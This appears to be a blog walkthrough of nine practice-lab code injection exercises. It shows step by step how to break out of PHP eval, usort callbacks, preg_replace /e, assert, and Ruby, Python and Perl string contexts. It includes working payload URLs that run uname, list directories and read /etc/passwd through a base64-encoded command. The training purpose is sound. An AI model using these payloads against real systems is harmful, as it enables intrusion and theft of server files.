Command injection vulnerability leads an attacker to run system level commands on vulnerable web application.
Scenario 1: If we have an URL like mentioned below:
http://ptl-0f2be846-40a8fc58.libcurl.so/?name=hacker
We can try to disturb the query here with “hacker” value.
If we enter “ (double quote) after hacker value, it will generate an error.
http://ptl-0f2be846-40a8fc58.libcurl.so/?name=hacker”
Parse error: syntax error, unexpected '!', expecting ',' or ';' in /var/www/index.php(16) : eval()'d code on line 1
Try to satisfy the condition/query like mentioned below
ptl-0f2be846-40a8fc58.libcurl.so/?name=hacker"."
. is a php syntax to add another statement.
NOw enter like mentioned below and command injection will be exploited on vulnerable application
ptl-0f2be846-40a8fc58.libcurl.so/?name=hacker".system("uname")."
Conclusion: When we entered first double quote (“) after hacker value then it broke the statement and then we used dot (.) to add another statement which is system(“uname”) and then last statement which is already available as a three exclamation signs (!!!).
At the end it brought : -
ptl-0f2be846-40a8fc58.libcurl.so/?name=hacker".system("uname")."
Scenario 2: In this scenario we are not exploiting predefined function. It is user created function.
ptl-204b7868-65e32952.libcurl.so/?order=name
User have a certain output on page and also he can sort this output in some manner.
If we enter single qoute (‘) after the name field then it throws an error.
ptl-204b7868-65e32952.libcurl.so/?order=name’
Parse error: syntax error, unexpected '',$b->name'' (T_CONSTANT_ENCAPSED_STRING) in /var/www/index.php(29) : runtime-created function on line 1
Warning: usort() expects parameter 2 to be a valid callback, no array or string given in /var/www/index.php on line 29
Now we need to complete this usort function and add our malicious payload after that somehow.
http://ptl-204b7868-65e32952.libcurl.so/?order=name,1);}//
Above URL satisfies the output with no errors now before the comments (//) and after the function closing ( } )we can add our statement like:
ptl-204b7868-65e32952.libcurl.so/?order=name,1);}system("uname");//
Conclusion : we closed and satisfied first function (with two values) and then we added second statement and exploited it successfully.
Scenario 3 :
Php uses a preg_replace function
ptl-73845d63-ef7c8a1a.libcurl.so/?new=hacker&pattern=/lamer/&base=Hello lamer
hacker&pattern = hacker will be the last, value replacing value.
/lamer/&base = is evaluating if lamer is entered
In this case if you enter “lamer”, it will replace it with hacker,
&base is a fregular expression and if you add a flag which is e with &base it will generate an error
Because e is a eval function which tries to evaluate the latest string as a php code after replacing, but as we know it is a text it will throw an error
ptl-73845d63-ef7c8a1a.libcurl.so/?new=hacker&pattern=/lamer/e&base=Hello lamer
Notice: Use of undefined constant hacker - assumed 'hacker' in /var/www/index.php(14) : regexp code on line 1
Hello hacker
Now we know the with eval or adding e with regular expression &base we can execute php code so we can enter system commands like
ptl-73845d63-ef7c8a1a.libcurl.so/?new=system("uname -a")&pattern=/lamer/e&base=Hello lamer
Scenario 4 :
In this scenario we are exploiting assert function of php
ptl-ff6a2224-d5d1e049.libcurl.so/?name=hacker
After adding a quote you will get an error
ptl-ff6a2224-d5d1e049.libcurl.so/?name=hacker’
Parse error: syntax error, unexpected '';' (T_ENCAPSED_AND_WHITESPACE) in /var/www/index.php(15) : assert code on line 1
Catchable fatal error: assert(): Failure evaluating code: 'hacker'' in /var/www/index.php on line 15
Now we need to satisfy the condition,
ptl-ff6a2224-d5d1e049.libcurl.so/?name=hacker’.’
It will statisfy but we cannot inject our code so add like this
ptl-ff6a2224-d5d1e049.libcurl.so/?name=hacker’.”.’
Now replace in between two single quotes and exploit it
ptl-ff6a2224-d5d1e049.libcurl.so/?name=hacker’.system(“uname -a”).’
Scenario 5:
The exercise/challenge is totally based on ruby
http://ptl-b4ab717d-fa304237.libcurl.so/?username=hacker
If we add double quote(“) with hacker value, then it generates the ruby error.
http://ptl-b4ab717d-fa304237.libcurl.so/?username=hacker”
Add + at the end as ruby uses + to append statements
http://ptl-b4ab717d-fa304237.libcurl.so/?username=hacker”+
To satisfy the statement you need to add like below
http://ptl-b4ab717d-fa304237.libcurl.so/?username=hacker”+””+”
Do URL encode the + sign %2b
http://ptl-b4ab717d-fa304237.libcurl.so/?username=hacker”%2b””%2b”
To test add test
http://ptl-b4ab717d-fa304237.libcurl.so/?username=hacker”%2b”test”%2b”
Output will be Hello hackertest
As ruby use (~) tilt sign to run the system level commands so replace double quotes in center like:
http://ptl-b4ab717d-fa304237.libcurl.so/?username=hacker”%2b`uname`%2b”
Scenario 6:
In this particular exercise I learned how to find what language has been used to develop the application and then how to exploit the vulnerability.
We have a url like:
http://ptl-0965dda5-eea846ab.libcurl.so/hello/hacker
Now i we give single quote ( ‘ ), nothing changes
Hello hacker'!
Give double quote ( “ )
http://ptl-0965dda5-eea846ab.libcurl.so/hello/hacker”
Internal Server Error
The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.
Give . (dot)
Will not satisfy the condition
ptl-0965dda5-eea846ab.libcurl.so/hello/hacker".""."
Give + (concatenation), it will satisfy
ptl-0965dda5-eea846ab.libcurl.so/hello/hacker"+""+"
Now URL encode the + sign
ptl-0965dda5-eea846ab.libcurl.so/hello/hacker"%2b""%2b"
Try entering text in between quotes and check the output
ptl-0965dda5-eea846ab.libcurl.so/hello/hacker"%2b"testcheck"%2b"
Hello hackertestcheck!
Eliminate double quotes in center and try adding ruby syntax of accessing system level commands (As we do not know which language is used so we are trying with ruby)
ptl-0965dda5-eea846ab.libcurl.so/hello/hacker"%2b`uname`%2b"
Internal Server Error
The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.
Try entering numbers without quotes
ptl-0965dda5-eea846ab.libcurl.so/hello/hacker"%2b1%2b"
Internal Server Error
The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.
Which means concatenation is not happening, application in rendering only string based output
Now we will try to convert into ruby strings
ptl-0965dda5-eea846ab.libcurl.so/hello/hacker"%2b1.to_s%2b"
1.to_s = converting 1 into string
Internal Server Error
The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.
Which means it is not using ruby in backend
Now we will try with python to convert output as a string
ptl-0965dda5-eea846ab.libcurl.so/hello/hacker"%2bstr(1)%2b"
str(1) = converting 1 into strings
This works and show like:
Hello hacker1!
This will give the directory listings
ptl-0965dda5-eea846ab.libcurl.so/hello/hacker"%2bstr(os.listdir("/"))%2b"
Hello hacker['dev', 'sys', 'lib64', 'home', 'lib', 'opt', 'etc', 'proc', 'var', 'mnt', 'boot', 'tmp', 'run', 'usr', 'bin', 'srv', 'sbin', 'root', 'media', '.dockerenv']!
This will also give the output
ptl-0965dda5-eea846ab.libcurl.so/hello/hacker"%2bstr(os.popen("ls").read())%2b"
Hello hackerapp.py app.pyc static templates !
Scenario 7:
Sometimes we need to import libraries to execute certain type of code injection.
This scenario shows, after knowing and satisfying the python code syntax how to exploit the vulnerability.
Use all steps of scenario 6 till exploitation. With the help of scenario 6 we will get to know that we need to exploit python code but before exploitation we need to import os library to run the pyload.
Check below mentioned payloads to exploit.
http://ptl-13b66894-ae44fed9.libcurl.so/hello/hacker”%2bstr(__import__('os').popen(%22ls%22).read())%2b”
http://ptl-13b66894-ae44fed9.libcurl.so/hello/hacker”%2bstr(__import__('os').listdir(%22/%22))%2b”
Scenario 8:
Suppose files are available but you cannot access due to names are different or some other thing.
You need to go deep by using scenario 7 but last step needs some more work.
http://ptl-13b66894-ae44fed9.libcurl.so/hello/hacker%22%2bstr(__import__('os').popen('uname%20-a').read())%2b%22
%2b = +
%22 = “
2.http://ptl-4bfb3882-622712e7.libcurl.so/hello/hacker%22%2bstr(__import__('os').popen(__import__('base64').b64decode('Y2F0ICcvZXRjL3Bhc3N3ZCc=')).read())%2b%22
In above URL we have encoded cat '/etc/passwd' to base 64 and then decoded in the payload.
If we analyse deeper then we will find the first payload was not working because forward slash (/) was not allowed, Even double slash was working but only once so we need to use an approach where no forward slashes are executed first and in backend it can be used to bring the data we required.
Scenario 9: -
In this we have a url which is not showing any error or direct response so we can inject the payload so which checked the request packet and found something interesting
Real url : - http://ptl-8e53ee3a-8496957a.libcurl.so/#hacker
URL in request : http://ptl-8e53ee3a-8496957a.libcurl.so/cgi-bin/hello?name=hacker
Here we simply injected ‘.’’.’ and satisfied the condition. Dot (.) is concatenation used in perl so we used ‘uname’ and replaced inside double quotes.
http://ptl-8e53ee3a-8496957a.libcurl.so/cgi-bin/hello?name=hacker%27.%27%27.%27
%27 = ‘
Final payload looked like below
http://ptl-8e53ee3a-8496957a.libcurl.so/cgi-bin/hello?name=hacker%27.`uname%20-a`.%27
ReplyDeleteAwesome blog. Thanks for sharing such a worthy information....
Top web frameworks for python
Top python web frameworks